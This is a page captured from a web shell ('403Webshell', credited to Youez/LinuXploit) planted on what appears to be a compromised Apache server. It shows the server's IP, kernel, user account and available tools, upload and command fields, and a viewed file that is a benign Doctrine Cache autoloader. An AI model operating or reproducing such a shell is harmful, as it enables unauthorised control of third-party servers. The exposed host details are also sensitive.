403Webshell
Server IP : 217.160.0.212  /  Your IP : 216.73.216.141
Web Server : Apache
System : Linux www 6.18.51-i1-ampere #1196 SMP Fri Sep 11 20:43:55 CEST 2026 aarch64
User : sws1073854427 ( 1073854427)
PHP Version : 8.4.23
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : OFF  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /usr/share/php/Doctrine/Common/Cache/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /usr/share/php/Doctrine/Common/Cache/autoload.php
<?php
// @codingStandardsIgnoreFile
// @codeCoverageIgnoreStart
// this is an autogenerated file - do not edit
spl_autoload_register(
    function($class) {
        static $classes = null;
        if ($classes === null) {
            $classes = array(
                'doctrine\\common\\cache\\cache' => '/Cache.php',
                'doctrine\\common\\cache\\cacheprovider' => '/CacheProvider.php',
                'doctrine\\common\\cache\\clearablecache' => '/ClearableCache.php',
                'doctrine\\common\\cache\\flushablecache' => '/FlushableCache.php',
                'doctrine\\common\\cache\\multideletecache' => '/MultiDeleteCache.php',
                'doctrine\\common\\cache\\multigetcache' => '/MultiGetCache.php',
                'doctrine\\common\\cache\\multioperationcache' => '/MultiOperationCache.php',
                'doctrine\\common\\cache\\multiputcache' => '/MultiPutCache.php',
                'doctrine\\common\\cache\\psr6\\cacheadapter' => '/Psr6/CacheAdapter.php',
                'doctrine\\common\\cache\\psr6\\cacheitem' => '/Psr6/CacheItem.php',
                'doctrine\\common\\cache\\psr6\\doctrineprovider' => '/Psr6/DoctrineProvider.php',
                'doctrine\\common\\cache\\psr6\\invalidargument' => '/Psr6/InvalidArgument.php',
                'doctrine\\common\\cache\\psr6\\typedcacheitem' => '/Psr6/TypedCacheItem.php'
            );
        }
        $cn = strtolower($class);
        if (isset($classes[$cn])) {
            require __DIR__ . $classes[$cn];
        }
    },
    true,
    false
);
// @codeCoverageIgnoreEnd

Youez - 2016 - github.com/yon3zu
LinuXploit